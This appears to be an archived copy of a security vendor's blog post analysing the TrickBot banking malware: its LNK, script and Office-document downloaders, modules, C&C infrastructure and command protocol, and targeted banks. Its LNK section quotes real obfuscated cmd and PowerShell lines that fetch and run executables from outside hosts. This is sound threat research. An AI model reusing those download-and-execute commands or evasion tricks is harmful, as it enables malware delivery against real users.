{
	"id": "7e8e98b1-879b-4037-90e4-5fa57263ec3c",
	"created_at": "2026-04-06T00:12:25.190416Z",
	"updated_at": "2026-04-10T03:20:31.145235Z",
	"deleted_at": null,
	"sha1_hash": "aeb02a18e1bd3599fe7befcc8805e17a3afc736b",
	"title": "TrickBot Emerges with a Few New Tricks | blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3637601,
	"plain_text": "TrickBot Emerges with a Few New Tricks | blog\r\nBy Abhay Kant Yadav, Atinderpal Singh\r\nPublished: 2020-04-09 · Archived: 2026-04-05 16:50:43 UTC\r\nFirst observed in 2016, TrickBot is a successor of the banking trojan Dyre and has become one of the most\r\nprevalent and dangerous malware strains in today's threat landscape, which is constantly monitored by the Zscaler\r\nThreatLabZ team. TrickBot is continually evolving as its developers add new features and tricks. It is modular,\r\nwith a main bot binary that loads other plugins capable of specific tasks, with new modules being introduced and\r\nold ones being improved at regular intervals.\r\n \r\nSolidarity with other malware\r\nTrickBot is often seen working with other types of malware, sometimes using them as an initial infection vector to\r\nfind its way into the target host or downloading other malware families to get the most out of an infection. For\r\nexample, Emotet, the rampant banking trojan, has become a major partner for TrickBot deployments. TrickBot is\r\nalso known to have deployed cryptominer payloads (Monero miner XMRIG) on infected hosts. And recently,\r\nRyuk has become the TrickBot developers’ favorite ransomware for squeezing more cash out of infections from\r\nhigh-value targets.\r\nDevelopers are now identifying high-value targets using data collected by TrickBot. Once a target is identified,\r\nthey use other tools like CobaltStrike, PowerShell Empire, PSExec, and AdFind to navigate and plant Ryuk\r\nransomware (discussed in an earlier post). Legal services and e-discovery giant Epiq Global had to take its\r\nsystems offline due to a Ryuk infection in the beginning of March 2020.\r\nThey have also developed new malware, called AnchorBot, which is based on TrickBot code and utilizes DNS as\r\nthe command-and-control (C\u0026C) medium. Unlike TrickBot, AnchorBot has not been seen in the wild using\r\nmalspam or other malware for deployment. It is probably a specialized version reserved for certain targets or may\r\nbe available to rent out to special customers, potentially nation-state actors. (Notably, Ryuk was attributed to\r\nNorth Korean actors based on code similarities with Hermes ransomware, but many researchers later argued that\r\nthese similarities were not conclusive.) \r\nSince almost every TrickBot infection starts with malspam containing an attached downloader or from a partner\r\nbotnet like Emotet, we will take a look at those downloading TrickBot loaders over the last year. We have\r\nprimarily seen three types of non-executable downloaders:\r\n \r\nLNK\r\nJS\r\nDOC\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 1 of 19\n\nLNK downloader\r\nTrickBot is often spread using spam emails with attached ZIP files containing LNK (.lnk) files. We have seen\r\nLNK files with the following icons.\r\nImage 1: LNK file icons observed in the wild\r\nNames of files observed:\r\nLabel.doc.lnk\r\nPrintOnline.pdf.lnk\r\nPrint.PDF.lnk\r\nConfirmationOnline.doc.lnk\r\nReadme_Invoice_Doc.doc.lnk\r\nInvoiceAug5.doc.lnk\r\nInvoice_Print.lnk\r\nDOC080219Admission.lnk\r\nOne interesting thing is that eight out of nine LNK files had the MachineID win-jbf0q9el659.\r\nSome samples contained a PowerShell script to download a payload from the URL directly in the Link Target\r\nfield. For example:\r\n%comspec% /r \"TIMEOUT /T 5\u0026echo F|xcopy /Y /V /H %PSModulePath:~43,-8%\\p*e?s*l.e?? %tmp%\\Ger.exe\r\n\u0026%tmp%\\Ger \"IwR ('https://parkc.org/filetext.php') -outfile $env:temp'\\ssd.exe'\"\u0026echo pause\u0026TimEout /t \r\n3\u0026%temp%/ssd\u0026selrkekrjg\u0026dsghd\u0026sfr345jwrf\u0026\u0026e56tdsf\"\r\n/C set o=HttPs:/\u0026powershEll \"$sd=new-object\r\nsystem.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\\D.exe');\"\u0026\"%programfiles%\\wiNDows nt\\accESsorIes\\wORdpaD\"\r\nc:\\pagefIle.syS\u0026%tmp%/d\u0026J34HH\u0026E34JSH_d+\u0026df\r\nThese LNK files contain batch commands to extract and run downloader VBS code. For example:\r\n%comspec% /c copy SnJfA \u0026 (findstr \"Mydlu.*\" Label.doc.lnk \u003e \"%tmp%\\SNkBU.vbs\" \u0026 \"%tmp%\\SNkBU.vbs\")\r\n\u0026 qcpST\r\nIt used the findstr command to find the start of a VBS script embedded in the LNK file and executed that script\r\nafter saving in the %temp% directory. Here, the name of the LNK file is provided to the findstr command. That\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 2 of 19\n\nalso works as an anti-sandbox trick for some of the sandboxes that do not run files with their original names.\r\nIn this script we mainly observed two types of obfuscation; one is where the obfuscated string is provided and it\r\nexecutes, replacing a part of it with “)+chr(“\r\nImage 2: Code using CHR obfuscation\r\nIn another type of obfuscation, two arrays of values are provided, and the decrypted script is built character by\r\ncharacter with arithmetic operations on array elements.\r\nImage 3: Code using arrays for obfuscation\r\nAfter decryption, the script looks the same for the LNK file as well as the script files from the spam emails:\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 3 of 19\n\nImage 4: Decrypted downloader payload\r\nThese variations may be an attempt to bypass AV emulators. The malware tries to create a shortcut and save by\r\npassing a parameter to the save method, which will fail on the real machine. After that, it checks if the file exists\r\nand only downloads if the file has not been created.\r\n \r\nScript downloader\r\nThe obfuscation scripts and final downloader scripts are similar to scripts extracted from LNK files. In these files,\r\nwe’ve seen some additional types of obfuscation along with the obfuscation seen in scripts from LNK files.\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 4 of 19\n\nImage 5: Obfuscated script\r\nImage 6: Another obfuscated script\r\nWhile in most cases, the final scripts responsible for downloading the TrickBot payload were identical and not\r\nobfuscated, in one case the script was slightly obfuscated:\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 5 of 19\n\nImage 7: Decrypted downloader with slight obfuscation\r\nDocument downloader\r\nDownloaders based on Office documents were once the favorite choice of TrickBot developers. But recently, we\r\nhave seen a downtrend in macro-based document usage for TrickBot delivery. \r\nSome of the document templates we have observed during last year are below.\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 6 of 19\n\nImage 8: Set of templates used by downloader documents to lure the end users\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 7 of 19\n\nImage 9: Another set of templates used by downloader documents to lure the end users\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 8 of 19\n\nImage 10: U.S. Employment template used by document downloaders\r\nImage 11: JP Morgan template used by document downloaders\r\n \r\nThere were different variations of documents downloading TrickBot. Some of the variations we observed\r\nincluded:\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 9 of 19\n\nDrop and execute JS/JSE files which further download the TrickBot payload. The dropped script file is\r\nsimilar to the files discussed in the script downloader section.\r\nMacro code downloads and executes payload.\r\nNo macro code in file, executable directly embedded in document as ActiveX, requires user to double-click.\r\nImage 12:  Executable directly embedded in document as ActiveX\r\nDeobfuscate and build batch commands to download file \r\nFirst create a copy of bitsadmin file\r\nDownload payload using copied bitsadmin file \r\nImage 13: Commands extracted used by downloader\r\nIn other cases, it drops a BAT file containing PowerShell code to download payload\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 10 of 19\n\nImage 14: PowerShell encrypted and decrypted command\r\nActions used to start execution of downloader:\r\nMacro Auto_Open()\r\nMacro Document_Open()\r\nMacro Document_Close()\r\nDouble-click by user to run ActiveX object\r\nLoader\r\nOnce it’s downloaded, the main TrickBot component known as the TrickBot loader begins to run. The loader acts\r\nas banking Trojan and is also responsible for downloading various modules for specific tasks. TrickBot modules\r\ncome in 32-bit and 64-bit and, depending on the architecture of the infected system, the loader downloads and\r\nruns the corresponding modules.\r\nThe following are the TrickBot modules seen in the wild:\r\nSysteminfo - For gathering basic information on the host\r\nimportDll - For stealing data from a browser \r\ninjectDll - For injecting into banking websites to steal credentials\r\nPwgrab - For grabbing passwords from various spots\r\ncookiesDll - For stealing/grabbing cookies\r\nmailsearcher - For traversal over all files in all drives in the system to steal\r\nsharedll - For transferring over to ADMIN shares and creating persistence via services\r\nnetworkDll - For gathering system information and network/domain topology\r\nNewBCtestDll - Backconnect SOCK5 module\r\npsfin - Point-of-Sale 'recon' module\r\nvncDll - Remote control/VNC module\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 11 of 19\n\nwormDll - For lateral movement\r\ntabDll - For spreading over SMB using EternalRomance and MS17-010\r\noutlookDll - For stealing data saved by Microsoft Outlook\r\ndomainDll - For LDAP harvesting of domain controller configuration\r\nmwormDll - For lateral movement/enumeration module via LDAP and SMB exploitation\r\nmshareDll - For lateral movement/enumeration via LDAP and SMB exploitation; mshare and mworm\r\nmodules work in cooperation\r\nrdpScanDll - New module that uses brute-force remote desktop protocol (RDP) for a specific list of victims\r\nIt downloads and injects each module into a new instance of svchost.exe. For each running TrickBot component\r\nthere is a corresponding instance of svchost.exe.\r\nThe latest version of loaders that we have seen in wild are 1087 and 1088, and the most recent config version is\r\n1000503.\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 12 of 19\n\nImage 15: TrickBot loader configuration\r\nWe looked at loader version numbers and their compilation dates, then plotted version 1058 to version 1088 with\r\ntheir corresponding compilation dates. It seems that two different versions are maintained at a time:\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 13 of 19\n\nImage 16: TrickBot loader version and compilation date timeline\r\nIt may seem that each version represents two botnets that are run independently, but according to our data, the\r\nC\u0026C infrastructure is shared by all versions. More than 1,400 C\u0026C IPs extracted from the TrickBot configuration\r\nwere used to draw a relationship map with loader versions.\r\nUnlike Emotet, which uses a separate first layer C\u0026C infrastructure for different epochs, we observed no such\r\norganization in TrickBot. It shares its first layer infrastructure between all levels, global site tags (gtags), and\r\nversions.\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 14 of 19\n\nImage 17: TrickBot loader version relationships with C\u0026C IPs\r\nSimilarly, almost all gtags in configs also share the same infrastructure or proxy infrastructure.\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 15 of 19\n\nImage 18: TrickBot gtag relation with C\u0026C IPs\r\nWith the exception of gtag mill (20mill), all others share C\u0026C infrastructure. \r\nImage 19: Configuration file extracted from MD5: 598bc23fc38b4712289ff5488bce2f1c containing \"20mill\" gtag\r\nC\u0026C infrastructure is shared between different levels of TrickBot infection, such as between loaders and modules\r\n(handling bots, modules, and webinjects).\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 16 of 19\n\nImage 20: Different type of configuration relationships with IPs\r\nCommunication\r\nTrickBot communicates with C\u0026C servers using GET requests and always uses numeric IP addresses as C\u0026C\r\naddresses; its port numbers are usually 443, 449, or 499. The communication always happens over SSL/TLS, but\r\nthe port can be any of the ports used by TrickBot. The TrickBot loader supports various commands that it uses to\r\ncommunicate with the C\u0026C servers.\r\nIts C\u0026C request pattern is:\r\n{server-ip:port}/{gtag}/{client_id}/{Command}\r\nSome of its interesting commands include:\r\n/0/ - initial contact format e.g /0/{os name}/{version}/{public ip}/{64 hex char}/{base64}\r\n/1/ - keep alive, wait for command\r\n/5/{name} - download module or injects e.g /5/injectDll64/, /5/dinj/\r\n/10/ Log module/command execution has started e.g. /10/62/972991/1/ \r\n/14/ - profiling information or important feedback e.g /14/user/{username}/0/   \r\n/23/{config_version} - Update base config\r\n/25/ - update bot e.g /25/M2vzSeNWHXZ2SZI8HNKwD/\r\n/60/ - post traffic captured by injectDll\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 17 of 19\n\n/63/ - issue command to component (x) e.g /63/injectDll/sTart/U3VjY2Vzcw==//    (‘Success’) /1/\r\n/64/ - issue command to ETERNALBLUE component (wormdll) e.g /64/wormDll/InfectMachine/infect/\r\n/send/ - used by mailsearcher component to POST exfil email addresses\r\nIts webinject config looks like this:\r\nImage 21: Trickbot webinject configuration\r\nRecently, around the second week-end of March, TrickBot added a few new banks from Italy to its target list,\r\nwhich includes:\r\ncedacri.it banking4you.it www.credem.it nowbanking.credit-agricole.it\r\ninbank.it friuladria.it finecobank.com youweb.bancobpm.it\r\ncsebo.it carispezia.it relaxbanking.it www.intesasanpaolo.com\r\ncreval.it cariparma.it bpergroup.net ibbweb.tecmarket.it\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 18 of 19\n\nmps.it unicredit.it icbp.seceti.it dbonline.italy.db.com\r\nposte.it ibk.nexi.it banking.bnl.it fideuramonline.it\r\ngruppocarige.it clienti.chebanca.it scrigno.popso.it qweb.quercia.com\r\nib.cbibanking.it ubibanca.com bancagenerali.it paco.cabel.it\r\nConclusion\r\nThreat actors like the developers of TrickBot are becoming more and more sophisticated. TrickBot recently\r\nintroduced a new module called rdpScanDll. And, most recently, TrickBot was observed using Android malware\r\nto bypass two-factor authentication in Germany. We have not seen the use of this app for other targets, but we\r\ndon’t expect it to be long until attackers begin to use it worldwide. The Zscaler ThreatLabZ team proactively\r\ntracks and ensures coverage to block downloaders, payloads, webinjects, and C\u0026C activity from TrickBot and\r\nrelated malware. Because TrickBot’s C\u0026C communications occur over SSL, we strongly recommend the use of\r\nSSL inspection to detect and block TrickBot and similar threats.\r\nExplore more Zscaler blogs\r\nSource: https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nhttps://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks"
	],
	"report_names": [
		"trickbot-emerges-few-new-tricks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434345,
	"ts_updated_at": 1775791231,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aeb02a18e1bd3599fe7befcc8805e17a3afc736b.pdf",
		"text": "https://archive.orkl.eu/aeb02a18e1bd3599fe7befcc8805e17a3afc736b.txt",
		"img": "https://archive.orkl.eu/aeb02a18e1bd3599fe7befcc8805e17a3afc736b.jpg"
	}
}